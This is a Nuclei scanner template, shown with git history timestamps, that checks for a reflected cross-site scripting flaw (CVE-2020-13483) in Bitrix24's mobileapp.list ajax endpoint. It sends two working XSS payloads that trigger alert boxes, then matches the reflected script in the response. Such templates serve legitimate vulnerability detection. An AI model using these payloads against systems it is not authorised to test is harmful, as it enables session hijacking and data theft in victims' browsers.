nuclei-templates/http/cves/2020/CVE-2020-13483.yaml

57 lines
2.6 KiB
YAML
Raw Normal View History

2021-03-10 02:53:48 +00:00
id: CVE-2020-13483
info:
name: Bitrix24 <=20.0.0 - Cross-Site Scripting
2022-01-19 08:14:01 +00:00
author: pikpikcu,3th1c_yuk1
severity: medium
description: The Web Application Firewall in Bitrix24 up to and including 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:22:36 +00:00
remediation: |
Upgrade to a patched version of Bitrix24 (version >20.0.0) to mitigate this vulnerability.
2022-01-19 08:14:01 +00:00
reference:
- https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
- https://twitter.com/brutelogic/status/1483073170827628547
- https://nvd.nist.gov/vuln/detail/CVE-2020-13483
- https://github.com/afinepl/research
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-13483
cwe-id: CWE-79
epss-score: 0.00113
epss-percentile: 0.43845
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: bitrix24
product: bitrix24
2024-01-14 09:21:50 +00:00
tags: cve2020,cve,xss,bitrix,bitrix24
2021-03-10 02:53:48 +00:00
http:
2021-03-10 02:53:48 +00:00
- method: GET
path:
2022-01-19 08:14:01 +00:00
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>'
2021-03-10 02:53:48 +00:00
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
2022-01-19 08:14:01 +00:00
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
2021-03-10 02:53:48 +00:00
matchers-condition: and
matchers:
- type: word
2022-01-19 08:14:01 +00:00
part: body
2021-03-10 02:53:48 +00:00
words:
2022-01-19 08:14:01 +00:00
- '<a href="/*">*/)});function __MobileAppList(){alert(1)}//'
2021-05-11 18:55:14 +00:00
- "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
2022-01-19 08:14:01 +00:00
condition: or
2021-03-10 08:49:10 +00:00
- type: word
2022-01-19 08:14:01 +00:00
part: header
2021-03-10 08:49:10 +00:00
words:
- text/html
2021-03-10 02:53:48 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022100c969dd14c4d494d022ccf2ee1851599d1a39f7853ce81508bbd20845162ddd8002205f3fb9d87eb78e066c23780860090f71d04bbfcc09ec204574049849d98b144c:922c64590222798bb761d5b6d8e72950